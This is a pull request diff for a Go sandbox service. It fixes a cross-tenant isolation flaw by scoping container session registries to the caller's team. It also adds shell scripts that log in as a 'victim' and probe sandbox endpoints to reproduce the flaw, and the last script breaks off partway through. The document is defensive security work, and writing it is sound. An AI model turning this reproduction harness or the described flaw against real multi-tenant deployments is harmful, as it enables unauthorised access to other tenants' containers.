### PR TITLE
fix: enforce cross-tenant sandbox container isolation (Incus)

### DIFF
--- a/pkg/api/sandbox_backend.go
+++ b/pkg/api/sandbox_backend.go
@@ -106,6 +106,29 @@ func buildPGSessionRegistry(ctx context.Context) *sandbox.SessionRegistry {
 	return sandbox.NewSessionRegistryFromStore(sessStore)
 }
 
+// sandboxSessionRegistryForRequest returns the sandbox SessionRegistry that
+// the caller is allowed to see, scoped to the request's tenant.
+//
+// In platform (multi-tenant / PostgreSQL) mode it returns the DB-backed
+// registry for the caller's org/team via buildPGSessionRegistry, so lookups
+// (List, ResolveSessionID, GetByContainerName, ...) only observe that team's
+// sandbox sessions. In personal / single-tenant (SQLite) mode
+// buildPGSessionRegistry returns nil and we fall back to the local
+// file-based registry, which is adequate because there is only one tenant.
+//
+// SECURITY: sandbox container-management handlers MUST obtain their registry
+// through this helper rather than calling sandbox.NewSessionRegistry()
+// directly. The direct call yields the unscoped personal-mode registry, which
+// on a platform deployment exposes every team's sandbox sessions and allows
+// cross-tenant list/delete/expose/proxy by container id.
+func sandboxSessionRegistryForRequest(r *http.Request) (*sandbox.SessionRegistry, error) {
+	if reg := buildPGSessionRegistry(r.Context()); reg != nil {
+		return reg, nil
+	}
+	// Personal / single-tenant deployments: no team schema to scope to.
+	return sandbox.NewSessionRegistry()
+}
+
 // teamTemplateSessionID returns the canonical session ID used by the
 // team-template editor for a given team slug. This is a well-known,
 // deterministic ID so the editor pod/container can be found across

--- a/pkg/api/sandbox_handlers.go
+++ b/pkg/api/sandbox_handlers.go
@@ -383,7 +383,7 @@ func SandboxDetailsHandler(w http.ResponseWriter, r *http.Request) {
 				if tplErr != nil {
 					slog.Warn("failed to create template registry", "error", tplErr)
 				}
-				sessRegistry, sessErr := sandbox.NewSessionRegistry()
+				sessRegistry, sessErr := sandboxSessionRegistryForRequest(r)
 				if sessErr != nil {
 					slog.Warn("failed to create session registry", "error", sessErr)
 				}
@@ -417,7 +417,7 @@ func SandboxContainerListHandler(w http.ResponseWriter, r *http.Request) {
 		return
 	}
 
-	sessRegistry, err := sandbox.NewSessionRegistry()
+	sessRegistry, err := sandboxSessionRegistryForRequest(r)
 	if err != nil {
 		respondError(w, http.StatusInternalServerError, "failed to load session registry: "+err.Error())
 		return
@@ -520,7 +520,7 @@ func SandboxContainerDeleteHandler(w http.ResponseWriter, r *http.Request) {
 		return
 	}
 
-	sessRegistry, err := sandbox.NewSessionRegistry()
+	sessRegistry, err := sandboxSessionRegistryForRequest(r)
 	if err != nil {
 		respondError(w, http.StatusInternalServerError, "failed to load session registry: "+err.Error())
 		return
@@ -550,7 +550,7 @@ func SandboxPruneHandler(w http.ResponseWriter, r *http.Request) {
 		return
 	}
 
-	sessRegistry, err := sandbox.NewSessionRegistry()
+	sessRegistry, err := sandboxSessionRegistryForRequest(r)
 	if err != nil {
 		respondError(w, http.StatusInternalServerError, "failed to load session registry: "+err.Error())
 		return
@@ -886,7 +886,7 @@ func SandboxExposePortHandler(w http.ResponseWriter, r *http.Request) {
 		return
 	}
 
-	sessRegistry, err := sandbox.NewSessionRegistry()
+	sessRegistry, err := sandboxSessionRegistryForRequest(r)
 	if err != nil {
 		respondError(w, http.StatusInternalServerError, "failed to load session registry: "+err.Error())
 		return
@@ -954,7 +954,7 @@ func SandboxUnexposePortHandler(w http.ResponseWriter, r *http.Request) {
 		return
 	}
 
-	sessRegistry, err := sandbox.NewSessionRegistry()
+	sessRegistry, err := sandboxSessionRegistryForRequest(r)
 	if err != nil {
 		respondError(w, http.StatusInternalServerError, "failed to load session registry: "+err.Error())
 		return
@@ -1009,7 +1009,7 @@ func SandboxPinContainerHandler(w http.ResponseWriter, r *http.Request) {
 		return
 	}
 
-	sessRegistry, err := sandbox.NewSessionRegistry()
+	sessRegistry, err := sandboxSessionRegistryForRequest(r)
 	if err != nil {
 		respondError(w, http.StatusInternalServerError, "failed to load session registry: "+err.Error())
 		return
@@ -1041,7 +1041,7 @@ func SandboxListExposedPortsHandler(w http.ResponseWriter, r *http.Request) {
 		return
 	}
 
-	sessRegistry, err := sandbox.NewSessionRegistry()
+	sessRegistry, err := sandboxSessionRegistryForRequest(r)
 	if err != nil {
 		respondError(w, http.StatusInternalServerError, "failed to load session registry: "+err.Error())
 		return

--- a/pkg/api/sandbox_proxy.go
+++ b/pkg/api/sandbox_proxy.go
@@ -16,7 +16,6 @@ import (
 	"time"
 
 	"github.com/gorilla/mux"
-	"github.com/SAP/astonish/pkg/sandbox"
 	incus "github.com/SAP/astonish/pkg/sandbox/incus"
 )
 
@@ -87,8 +86,12 @@ func SandboxProxyHandler(w http.ResponseWriter, r *http.Request) {
 		return
 	}
 
-	// Check that the port is explicitly exposed
-	sessRegistry, err := sandbox.NewSessionRegistry()
+	// Check that the port is explicitly exposed.
+	// SECURITY: use the tenant-scoped registry so a caller can only proxy
+	// into containers owned by their own team. sandbox.NewSessionRegistry()
+	// would return the unscoped personal-mode registry and allow cross-tenant
+	// proxying by container name on a platform deployment.
+	sessRegistry, err := sandboxSessionRegistryForRequest(r)
 	if err != nil {
 		respondError(w, http.StatusInternalServerError, `{"error":"failed to load session registry"}`)
 		return

--- a/pkg/api/session_handlers.go
+++ b/pkg/api/session_handlers.go
@@ -957,7 +957,7 @@ func readFromSandboxContainer(r *http.Request, sessionID, filePath string) ([]by
 	if err != nil || appCfg == nil || !sandbox.IsSandboxEnabled(&appCfg.Sandbox) {
 		return nil, false
 	}
-	registry, err := sandbox.NewSessionRegistry()
+	registry, err := sandboxSessionRegistryForRequest(r)
 	if err != nil {
 		slog.Debug("failed to load sandbox session registry", "error", err)
 		return nil, false

--- a/pkg/launcher/chat_factory.go
+++ b/pkg/launcher/chat_factory.go
@@ -925,9 +925,34 @@ func NewWiredChatAgent(ctx context.Context, cfg *ChatFactoryConfig) (*ChatFactor
 				return nil, fmt.Errorf("sandbox is enabled but the runtime is not available: %w\n\nTo disable sandbox, set 'sandbox.enabled: false' in ~/.config/astonish/config.yaml", sandboxErr)
 			}
 
-			sessRegistry, regErr := sandbox.NewSessionRegistry()
-			if regErr != nil {
-				return nil, fmt.Errorf("sandbox is enabled but session registry failed: %w", regErr)
+			// The daemon is always platform: session records must live in the
+			// team-scoped platform store (PG, or SQLite in localhost mode) so
+			// that the tenant-scoped HTTP handlers (list/delete/expose/proxy)
+			// observe exactly the containers created here — and only for the
+			// caller's own team. The local JSON registry is legacy and is used
+			// only as a last-resort fallback when tenant context is missing.
+			var sessRegistry *sandbox.SessionRegistry
+			if svc := store.FromContext(ctx); svc != nil && svc.Platform != nil {
+				orgSlug := store.OrgSlugFromContext(ctx)
+				teamSlug := store.TeamSlugFromContext(ctx)
+				if orgSlug == "" {
+					orgSlug = cfg.AppConfig.Storage.Auth.GetDefaultOrgSlug()
+				}
+				if teamSlug == "" {
+					teamSlug = "general"
+				}
+				if provider, ok := svc.Platform.(store.SandboxSessionProvider); ok {
+					if sessStore := provider.SandboxSessionsForTeam(ctx, orgSlug, teamSlug); sessStore != nil {
+						sessRegistry = sandbox.NewSessionRegistryFromStore(sessStore)
+					}
+				}
+			}
+			if sessRegistry == nil {
+				var regErr error
+				sessRegistry, regErr = sandbox.NewSessionRegistry()
+				if regErr != nil {
+					return nil, fmt.Errorf("sandbox is enabled but session registry failed: %w", regErr)
+				}
 			}
 
 			tplRegistry, tplErr := sandbox.NewTemplateRegistry()

--- a/pkg/launcher/chat_factory.go
+++ b/pkg/launcher/chat_factory.go
@@ -929,29 +929,29 @@ func NewWiredChatAgent(ctx context.Context, cfg *ChatFactoryConfig) (*ChatFactor
 			// team-scoped platform store (PG, or SQLite in localhost mode) so
 			// that the tenant-scoped HTTP handlers (list/delete/expose/proxy)
 			// observe exactly the containers created here — and only for the
-			// caller's own team. The local JSON registry is legacy and is used
-			// only as a last-resort fallback when tenant context is missing.
-			var sessRegistry *sandbox.SessionRegistry
-			if svc := store.FromContext(ctx); svc != nil && svc.Platform != nil {
-				orgSlug := store.OrgSlugFromContext(ctx)
-				teamSlug := store.TeamSlugFromContext(ctx)
-				if orgSlug == "" {
-					orgSlug = cfg.AppConfig.Storage.Auth.GetDefaultOrgSlug()
-				}
-				if teamSlug == "" {
-					teamSlug = "general"
-				}
-				if provider, ok := svc.Platform.(store.SandboxSessionProvider); ok {
-					if sessStore := provider.SandboxSessionsForTeam(ctx, orgSlug, teamSlug); sessStore != nil {
-						sessRegistry = sandbox.NewSessionRegistryFromStore(sessStore)
-					}
-				}
+			// caller's own team.
+			//
+			// CRITICAL: the Studio chat agent (and this pool) is constructed
+			// ONCE, lazily, on the first chat request and then shared across
+			// every team for the life of the process. So we must NOT bind a
+			// single team's registry here — doing so would send every team's
+			// containers into whichever team happened to trigger the first
+			// chat. Instead we install a per-session resolver (below) that the
+			// pool invokes with the caller's org/team resolved from the live
+			// request context at bind time. The registry created here is only a
+			// last-resort fallback for sessions with no tenant context.
+			sessRegistry, regErr := sandbox.NewSessionRegistry()
+			if regErr != nil {
+				return nil, fmt.Errorf("sandbox is enabled but session registry failed: %w", regErr)
 			}
-			if sessRegistry == nil {
-				var regErr error
-				sessRegistry, regErr = sandbox.NewSessionRegistry()
-				if regErr != nil {
-					return nil, fmt.Errorf("sandbox is enabled but session registry failed: %w", regErr)
+
+			// Capture the platform backend so the per-session resolver can build
+			// a team-scoped registry for any org/team on demand. Resolved from
+			// the factory ctx's store service (stable for the process).
+			var sandboxSessionProvider store.SandboxSessionProvider
+			if svc := store.FromContext(ctx); svc != nil && svc.Platform != nil {
+				if provider, ok := svc.Platform.(store.SandboxSessionProvider); ok {
+					sandboxSessionProvider = provider
 				}
 			}
 
@@ -967,6 +967,26 @@ func NewWiredChatAgent(ctx context.Context, cfg *ChatFactoryConfig) (*ChatFactor
 			// on the first tool call for that session.
 			limits := sandbox.EffectiveLimits(&cfg.AppConfig.Sandbox)
 			nodePool := sandbox.NewNodeClientPool(sandboxClient, sessRegistry, tplRegistry, "", &limits)
+
+			// Install the per-session team registry resolver. NodeTool records
+			// the caller's org/team on the session (SetSessionScope) from the
+			// live request context; the pool calls this to obtain that team's
+			// DB-backed registry so the container record lands in the caller's
+			// own team schema. Returns nil when the platform backend does not
+			// support DB-backed sandbox sessions, in which case the pool falls
+			// back to the fallback registry above.
+			if sandboxSessionProvider != nil {
+				nodePool.SetRegistryResolver(func(orgSlug, teamSlug string) *sandbox.SessionRegistry {
+					if orgSlug == "" || teamSlug == "" {
+						return nil
+					}
+					sessStore := sandboxSessionProvider.SandboxSessionsForTeam(ctx, orgSlug, teamSlug)
+					if sessStore == nil {
+						return nil
+					}
+					return sandbox.NewSessionRegistryFromStore(sessStore)
+				})
+			}
 
 			// Wrap all tool category slices with NodeTool proxies (pool-backed).
 			// Browser tools are NOT wrapped — they run on the host and need direct

--- a/pkg/sandbox/backend_pool.go
+++ b/pkg/sandbox/backend_pool.go
@@ -71,18 +71,18 @@ const backendExecTimeout = 5 * time.Minute
 // triggers the first network round-trip. Safe for concurrent Call().
 type backendNodeClient struct {
 	backend    Backend
-	sessionID  string // set by BindSession; stable after first call
-	templateID string // may be empty → backend default
+	sessionID  string   // set by BindSession; stable after first call
+	templateID string   // may be empty → backend default
 	layerChain []string // pre-resolved chain (K8s); nil → derive from templateID
-	image      string // per-template container image (OpenShell); empty → backend default
+	image      string   // per-template container image (OpenShell); empty → backend default
 	limits     ResourceLimits
 	sessionEnv map[string]string
 
-	mu         sync.Mutex
-	bound      bool          // BindSession has run
-	bindDone   chan struct{} // closed once the create/start round-trip finishes
-	bindErr    error         // captured on bindDone close
-	closed     bool          // Cleanup has run
+	mu       sync.Mutex
+	bound    bool          // BindSession has run
+	bindDone chan struct{} // closed once the create/start round-trip finishes
+	bindErr  error         // captured on bindDone close
+	closed   bool          // Cleanup has run
 	// networkAllowEndpoints are baked into OpenShell CreateSession when set
 	// before BindSession completes provisioning (see SetNetworkAllowEndpoints).
 	networkAllowEndpoints []NetworkAllowEndpoint
@@ -540,6 +540,14 @@ func (p *backendPool) GetBackend() Backend {
 	return p.backend
 }
 
+// SetSessionScope is a no-op for backend pools. The backend-agnostic pools
+// (K8s/OpenShell/mock) resolve their team-scoped session store inside the
+// Backend at construction time via BackendFromAppConfigWithSessions; the
+// registry is not swappable per session here. Per-session tenant routing for
+// those backends is a separate concern and not part of the Incus cross-tenant
+// container-isolation fix this method supports. Present to satisfy ToolNodePool.
+func (p *backendPool) SetSessionScope(_, _, _ string) {}
+
 func (p *backendPool) getOrCreate(sessionID, template string, chain []string, image string) ToolNodeClient {
 	if sessionID == "" {
 		return nil
@@ -699,3 +707,8 @@ func (p *singleClientPool) Alias(_, _ string) {}
 
 // Remove is a no-op for fleet single-client pools (the client is pinned).
 func (p *singleClientPool) Remove(_ string) {}
+
+// SetSessionScope is a no-op for fleet single-client pools. Fleet sessions bind
+// their own registry and org/team at wiring time (wireFleetSandbox), so there
+// is no per-session tenant resolution to perform here.
+func (p *singleClientPool) SetSessionScope(_, _, _ string) {}

--- a/pkg/sandbox/flow_warm_test.go
+++ b/pkg/sandbox/flow_warm_test.go
@@ -62,10 +62,11 @@ func (s *warmSpyPool) GetOrCreateWithChain(string, string, []string) ToolNodeCli
 func (s *warmSpyPool) GetOrCreateWithImage(string, string, []string, string) ToolNodeClient {
 	return s.client
 }
-func (s *warmSpyPool) Cleanup()            {}
-func (s *warmSpyPool) GetBackend() Backend { return nil }
-func (s *warmSpyPool) Alias(_, _ string)   {}
-func (s *warmSpyPool) Remove(_ string)     {}
+func (s *warmSpyPool) Cleanup()                       {}
+func (s *warmSpyPool) GetBackend() Backend            { return nil }
+func (s *warmSpyPool) Alias(_, _ string)              {}
+func (s *warmSpyPool) Remove(_ string)                {}
+func (s *warmSpyPool) SetSessionScope(_, _, _ string) {}
 
 func TestWarmFlowSession_BindsAndEnsuresReady(t *testing.T) {
 	prev := NetworkPolicyPreSeeder

--- a/pkg/sandbox/node.go
+++ b/pkg/sandbox/node.go
@@ -939,6 +939,26 @@ type NodeClientPool struct {
 	closed   bool
 	orgSlug  string // org slug for container naming/networking (platform mode)
 	teamSlug string // team slug for container naming (platform mode)
+
+	// registryResolver, when set, resolves the team-scoped session registry
+	// for a given org/team at per-session bind time. This is how platform
+	// deployments route each chat session's container record into the caller's
+	// own team schema instead of a single registry captured at pool-construction
+	// time (which would bind every team's containers to whichever team happened
+	// to trigger the first chat). Returns nil to fall back to the pool default.
+	registryResolver func(orgSlug, teamSlug string) *SessionRegistry
+
+	// sessionScopes holds per-session tenant overrides resolved from the live
+	// request context (see SetSessionScope). Keyed by session ID.
+	sessionScopes map[string]sessionScope
+}
+
+// sessionScope captures the tenant-resolved registry and slugs for a single
+// session, resolved from the request that first touches that session.
+type sessionScope struct {
+	registry *SessionRegistry
+	orgSlug  string
+	teamSlug string
 }
 
 // NewNodeClientPool creates a pool that will create per-session LazyNodeClients
@@ -950,12 +970,13 @@ type NodeClientPool struct {
 // components that have been migrated to the Backend interface (Phase B.3).
 func NewNodeClientPool(client *IncusClient, sessRegistry *SessionRegistry, tplRegistry *TemplateRegistry, template string, limits *config.SandboxLimits) *NodeClientPool {
 	p := &NodeClientPool{
-		incusClient:  client,
-		sessRegistry: sessRegistry,
-		tplRegistry:  tplRegistry,
-		template:     template,
-		limits:       limits,
-		clients:      make(map[string]*LazyNodeClient),
+		incusClient:   client,
+		sessRegistry:  sessRegistry,
+		tplRegistry:   tplRegistry,
+		template:      template,
+		limits:        limits,
+		clients:       make(map[string]*LazyNodeClient),
+		sessionScopes: make(map[string]sessionScope),
 	}
 	// Best-effort Backend construction. Failure here is non-fatal: callers
 	// that need the Backend can check GetBackend() for nil. This keeps pool
@@ -999,6 +1020,51 @@ func (p *NodeClientPool) OrgSlug() string {
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	return p.orgSlug
+}
+
+// SetRegistryResolver installs a function that resolves the team-scoped session
+// registry for a given org/team. Platform deployments set this so that each
+// chat session's container record is persisted into the caller's own team
+// schema (resolved per session from the live request context via
+// SetSessionScope), rather than a single registry captured when the pool — and
+// the process-wide shared chat agent — was first constructed.
+func (p *NodeClientPool) SetRegistryResolver(fn func(orgSlug, teamSlug string) *SessionRegistry) {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	p.registryResolver = fn
+}
+
+// SetSessionScope records the tenant identity for a session, resolved from the
+// live request context (see NodeTool.getClientFromContext). If a registry
+// resolver is installed, the team-scoped registry is resolved now and used for
+// this session's container lifecycle so the record lands in the caller's team
+// schema. This must be called before the session's first GetOrCreate* so the
+// freshly created LazyNodeClient picks up the correct registry and slugs.
+//
+// It is a no-op once a client already exists for the session (the registry and
+// slugs are immutable for the life of a container) and when both slugs are
+// empty (nothing to scope — the pool default applies).
+func (p *NodeClientPool) SetSessionScope(sessionID, orgSlug, teamSlug string) {
+	if sessionID == "" || (orgSlug == "" && teamSlug == "") {
+		return
+	}
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	if p.closed {
+		return
+	}
+	// Immutable once a client (and therefore a container) exists.
+	if _, ok := p.clients[sessionID]; ok {
+		return
+	}
+	if _, ok := p.sessionScopes[sessionID]; ok {
+		return
+	}
+	scope := sessionScope{orgSlug: orgSlug, teamSlug: teamSlug}
+	if p.registryResolver != nil {
+		scope.registry = p.registryResolver(orgSlug, teamSlug)
+	}
+	p.sessionScopes[sessionID] = scope
 }
 
 // GetOrCreate returns the LazyNodeClient for the given session ID, creating
@@ -1055,11 +1121,25 @@ func (p *NodeClientPool) GetOrCreateWithTemplate(sessionID, template string) *La
 		tpl = template
 	}
 
-	// Create a new LazyNodeClient for this session
-	client := NewLazyNodeClient(p.incusClient, p.sessRegistry, p.tplRegistry, tpl, p.limits)
+	// Create a new LazyNodeClient for this session. If a per-session tenant
+	// scope was resolved from the request context (platform mode), use its
+	// team-scoped registry and slugs so the container record lands in the
+	// caller's own team schema; otherwise fall back to the pool defaults.
+	sessRegistry := p.sessRegistry
+	orgSlug := p.orgSlug
+	teamSlug := p.teamSlug
+	if scope, ok := p.sessionScopes[sessionID]; ok {
+		if scope.registry != nil {
+			sessRegistry = scope.registry
+		}
+		orgSlug = scope.orgSlug
+		teamSlug = scope.teamSlug
+	}
+
+	client := NewLazyNodeClient(p.incusClient, sessRegistry, p.tplRegistry, tpl, p.limits)
 	client.Env = p.env
-	client.OrgSlug = p.orgSlug
-	client.TeamSlug = p.teamSlug
+	client.OrgSlug = orgSlug
+	client.TeamSlug = teamSlug
 	p.clients[sessionID] = client
 	return client
 }
@@ -1087,6 +1167,14 @@ func (p *NodeClientPool) Alias(childSessionID, parentSessionID string) {
 	}
 
 	p.clients[childSessionID] = parent
+	// Share the parent's tenant scope so the child (sub-agent) resolves the
+	// same team schema if it ever creates its own client.
+	if scope, ok := p.sessionScopes[parentSessionID]; ok {
+		if p.sessionScopes == nil {
+			p.sessionScopes = make(map[string]sessionScope)
+		}
+		p.sessionScopes[childSessionID] = scope
+	}
 }
 
 // TouchActivity updates the last activity timestamp for a session's container
@@ -1112,6 +1200,7 @@ func (p *NodeClientPool) Remove(sessionID string) {
 	if ok {
 		delete(p.clients, sessionID)
 	}
+	delete(p.sessionScopes, sessionID)
 	p.mu.Unlock()
 
 	if ok && client != nil {
@@ -1131,6 +1220,7 @@ func (p *NodeClientPool) Cleanup() {
 		clients[k] = v
 	}
 	p.clients = nil
+	p.sessionScopes = nil
 	p.mu.Unlock()
 
 	for _, client := range clients {

--- a/pkg/sandbox/node_interfaces.go
+++ b/pkg/sandbox/node_interfaces.go
@@ -121,6 +121,14 @@ type ToolNodePool interface {
 	// first). Next GetOrCreate returns a fresh unbound client. Used by
 	// ephemeral adaptive scheduler runs after DestroySandbox.
 	Remove(sessionID string)
+
+	// SetSessionScope records the tenant identity (org/team) for a session,
+	// resolved from the live request context, before the session's first
+	// GetOrCreate*. Platform pools use it to route the session's container
+	// record into the caller's own team schema instead of a registry bound
+	// when the process-wide chat agent was first constructed. No-op when the
+	// session already has a client or both slugs are empty.
+	SetSessionScope(sessionID, orgSlug, teamSlug string)
 }
 
 // Compile-time assertions that the concrete Incus-bound types satisfy
@@ -195,4 +203,8 @@ func (a *nodePoolAdapter) Alias(childSessionID, parentSessionID string) {
 
 func (a *nodePoolAdapter) Remove(sessionID string) {
 	a.p.Remove(sessionID)
+}
+
+func (a *nodePoolAdapter) SetSessionScope(sessionID, orgSlug, teamSlug string) {
+	a.p.SetSessionScope(sessionID, orgSlug, teamSlug)
 }

--- a/pkg/sandbox/node_tool.go
+++ b/pkg/sandbox/node_tool.go
@@ -342,6 +342,17 @@ func (nt *NodeTool) getClientFromContext(ctx context.Context, sessionID string) 
 		tpl := store.SandboxTemplateFromContext(ctx)
 		chain := store.SandboxLayerChainFromContext(ctx)
 		image := store.SandboxImageFromContext(ctx)
+		// Resolve the caller's tenant from the live request context and record
+		// it for this session BEFORE the pool creates the client. Platform pools
+		// use this to persist the container record into the caller's own team
+		// schema. Without this, the pool would use whatever registry/team was
+		// bound when the process-wide shared chat agent was first constructed,
+		// sending every team's containers into a single schema (cross-tenant bug).
+		orgSlug := store.OrgSlugFromContext(ctx)
+		teamSlug := store.TeamSlugFromContext(ctx)
+		if orgSlug != "" || teamSlug != "" {
+			nt.pool.SetSessionScope(sessionID, orgSlug, teamSlug)
+		}
 		if len(chain) > 0 || image != "" {
 			// Use the full-context method when we have a chain and/or image.
 			return nt.pool.GetOrCreateWithImage(sessionID, tpl, chain, image)

--- a/pkg/sandbox/node_tool_test.go
+++ b/pkg/sandbox/node_tool_test.go
@@ -18,11 +18,14 @@ import (
 
 // spyPool records which ToolNodePool method was called and with what args.
 type spyPool struct {
-	method   string
-	session  string
-	template string
-	chain    []string
-	image    string
+	method    string
+	session   string
+	template  string
+	chain     []string
+	image     string
+	scopeSess string
+	scopeOrg  string
+	scopeTeam string
 }
 
 func (s *spyPool) GetOrCreate(sessionID string) ToolNodeClient {
@@ -62,6 +65,12 @@ func (s *spyPool) GetBackend() Backend { return nil }
 func (s *spyPool) Alias(_, _ string) {}
 
 func (s *spyPool) Remove(_ string) {}
+
+func (s *spyPool) SetSessionScope(sessionID, orgSlug, teamSlug string) {
+	s.scopeSess = sessionID
+	s.scopeOrg = orgSlug
+	s.scopeTeam = teamSlug
+}
 
 // stubClient satisfies ToolNodeClient for test purposes.
 type stubClient struct{}
@@ -112,10 +121,11 @@ func (s *preseedSpyPool) GetOrCreateWithChain(string, string, []string) ToolNode
 func (s *preseedSpyPool) GetOrCreateWithImage(string, string, []string, string) ToolNodeClient {
 	return s.client
 }
-func (s *preseedSpyPool) Cleanup()            {}
-func (s *preseedSpyPool) GetBackend() Backend { return nil }
-func (s *preseedSpyPool) Alias(_, _ string)   {}
-func (s *preseedSpyPool) Remove(_ string)     {}
+func (s *preseedSpyPool) Cleanup()                       {}
+func (s *preseedSpyPool) GetBackend() Backend            { return nil }
+func (s *preseedSpyPool) Alias(_, _ string)              {}
+func (s *preseedSpyPool) Remove(_ string)                {}
+func (s *preseedSpyPool) SetSessionScope(_, _, _ string) {}
 
 type testNetworkPolicyStore struct {
 	rules []store.NetworkPolicyRule
@@ -305,6 +315,81 @@ func TestGetClientFromContext_TemplateNoChain(t *testing.T) {
 	}
 	if spy.template != "my-tpl" {
 		t.Fatalf("expected template 'my-tpl', got %q", spy.template)
+	}
+}
+
+func TestGetClientFromContext_PropagatesTenantScope(t *testing.T) {
+	// The caller's org/team from the live request context must be recorded on
+	// the session (SetSessionScope) before the pool creates a client, so the
+	// container record lands in the caller's own team schema. This is the fix
+	// for the cross-tenant sandbox container leak.
+	spy := &spyPool{}
+	nt := &NodeTool{pool: spy}
+
+	ctx := context.Background()
+	ctx = store.WithOrgSlug(ctx, "myorg")
+	ctx = store.WithTeamSlug(ctx, "test-b")
+
+	if client := nt.getClientFromContext(ctx, "session-scoped"); client == nil {
+		t.Fatal("expected non-nil client")
+	}
+	if spy.scopeSess != "session-scoped" {
+		t.Fatalf("expected scope session 'session-scoped', got %q", spy.scopeSess)
+	}
+	if spy.scopeOrg != "myorg" {
+		t.Fatalf("expected scope org 'myorg', got %q", spy.scopeOrg)
+	}
+	if spy.scopeTeam != "test-b" {
+		t.Fatalf("expected scope team 'test-b', got %q", spy.scopeTeam)
+	}
+}
+
+func TestGetClientFromContext_NoTenantScopeWhenSlugsAbsent(t *testing.T) {
+	// Without tenant slugs in context (e.g. personal/localhost single tenant),
+	// getClientFromContext must not call SetSessionScope, so the pool keeps its
+	// default registry behavior.
+	spy := &spyPool{}
+	nt := &NodeTool{pool: spy}
+
+	if client := nt.getClientFromContext(context.Background(), "session-plain"); client == nil {
+		t.Fatal("expected non-nil client")
+	}
+	if spy.scopeSess != "" || spy.scopeOrg != "" || spy.scopeTeam != "" {
+		t.Fatalf("expected no scope call, got sess=%q org=%q team=%q", spy.scopeSess, spy.scopeOrg, spy.scopeTeam)
+	}
+}
+
+func TestNodeClientPool_SessionScopeSelectsResolvedRegistry(t *testing.T) {
+	// SetSessionScope must resolve the team-scoped registry via the installed
+	// resolver and use it (plus the org/team slugs) for the LazyNodeClient the
+	// pool creates for that session — instead of the pool's default registry.
+	defaultReg := newTestRegistry(t)
+	teamReg := newTestRegistry(t)
+
+	pool := NewNodeClientPool(nil, defaultReg, nil, "", nil)
+	var gotOrg, gotTeam string
+	pool.SetRegistryResolver(func(orgSlug, teamSlug string) *SessionRegistry {
+		gotOrg, gotTeam = orgSlug, teamSlug
+		if orgSlug == "myorg" && teamSlug == "test-b" {
+			return teamReg
+		}
+		return nil
+	})
+
+	pool.SetSessionScope("sess-1", "myorg", "test-b")
+	if gotOrg != "myorg" || gotTeam != "test-b" {
+		t.Fatalf("resolver got org=%q team=%q", gotOrg, gotTeam)
+	}
+
+	client := pool.GetOrCreate("sess-1")
+	if client == nil {
+		t.Fatal("expected non-nil client")
+	}
+	if client.sessRegistry != teamReg {
+		t.Fatal("expected client to use the resolved team registry, not the pool default")
+	}
+	if client.OrgSlug != "myorg" || client.TeamSlug != "test-b" {
+		t.Fatalf("expected org/team slugs on client, got org=%q team=%q", client.OrgSlug, client.TeamSlug)
 	}
 }
 

--- a/tests/security/cross-tenant-sandbox/.gitignore
+++ b/tests/security/cross-tenant-sandbox/.gitignore
@@ -1,0 +1,3 @@
+.env
+.state/
+*.log

--- a/tests/security/cross-tenant-sandbox/00-check-backend.sh
+++ b/tests/security/cross-tenant-sandbox/00-check-backend.sh
@@ -1,0 +1,68 @@
+#!/usr/bin/env bash
+# 00 — Probe the platform sandbox backend.
+# Confirms auth works and tells you whether the reported Incus-only
+# container APIs can even run here.
+set -euo pipefail
+# shellcheck source=_lib.sh
+source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/_lib.sh"
+
+banner "00  Probe sandbox backend"
+require_state victim.json
+
+echo "→ GET /api/sandbox/status"
+status_body="$(api victim GET /api/sandbox/status)"
+print_http
+echo "${status_body}" | jq . 2>/dev/null || echo "${status_body}"
+echo "${status_body}" > "${STATE_DIR}/sandbox-status.json"
+
+echo
+echo "→ GET /api/sandbox/details"
+details_body="$(api victim GET /api/sandbox/details)"
+print_http
+echo "${details_body}" | jq . 2>/dev/null || echo "${details_body}"
+echo "${details_body}" > "${STATE_DIR}/sandbox-details.json"
+
+backend="$(echo "${status_body}" | jq -r '.backend // .platform // empty' 2>/dev/null || true)"
+platform="$(echo "${status_body}" | jq -r '.platform // empty' 2>/dev/null || true)"
+enabled="$(echo "${status_body}" | jq -r '.sandboxEnabled // .sandbox_enabled // empty' 2>/dev/null || true)"
+runtime="$(echo "${status_body}" | jq -r '.runtimeAvailable // .runtime_available // empty' 2>/dev/null || true)"
+
+echo
+echo "  sandboxEnabled : ${enabled}"
+echo "  backend        : ${backend}"
+echo "  platform       : ${platform}"
+echo "  runtimeAvailable: ${runtime}"
+
+case "${backend}|${platform}" in
+  *k8s*|*kubernetes*)
+    echo "${backend:-k8s}" > "${STATE_DIR}/backend-kind"
+    echo
+    echo "This host is Kubernetes, not Incus."
+    echo
+    echo "The reported handlers (GET/DELETE /api/sandbox/containers,"
+    echo "expose, pin, proxy) all call sandboxConnect() → Incus."
+    echo "On K8s they return HTTP 503 before any tenant lookup runs."
+    echo
+    echo "You CAN still run 03+ to capture that 503 as evidence that"
+    echo "the reported path is Incus-only. You CANNOT take over another"
+    echo "team's K8s pod through these endpoints."
+    echo
+    echo "Next: ./03-victim-list-containers.sh   # expect HTTP 503"
+    ;;
+  *openshell*)
+    echo "openshell" > "${STATE_DIR}/backend-kind"
+    echo
+    echo "This host is OpenShell. Same situation as K8s: the reported"
+    echo "container APIs are Incus-only and will 503."
+    echo
+    echo "Next: ./03-victim-list-containers.sh   # expect HTTP 503"
+    ;;
+  *)
+    echo "${backend:-incus}" > "${STATE_DIR}/backend-kind"
+    echo
+    echo "Backend looks like Incus. The reported chain can be simulated."
+    echo
+    echo "Next: start a sandbox as the victim in Studio, then:"
+    echo "  ./03-victim-list-containers.sh"
+    ;;
+esac

--- a/tests/security/cross-tenant-sandbox/01-victim-login.sh
+++ b/tests/security/cross-tenant-sandbox/01-victim-login.sh
@@ -1,0 +1,17 @@
+#!/usr/bin/env bash
+# 01 — Log in as the victim (Team B).
+# Saves the CLI access token to .state/victim.json.
+set -euo pipefail
+# shellcheck source=_lib.sh
+source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/_lib.sh"
+
+banner "01  Login as victim (Team B)"
+require_var VICTIM_EMAIL
+require_var VICTIM_PASSWORD
+
+login victim "${VICTIM_EMAIL}" "${VICTIM_PASSWORD}" "${VICTIM_ORG:-}" "${VICTIM_TEAM:-}"
+
+echo
+echo "Next: start a sandbox session as this user in Studio (chat with sandbox"
+echo "enabled, or any flow that creates a container), then run:"
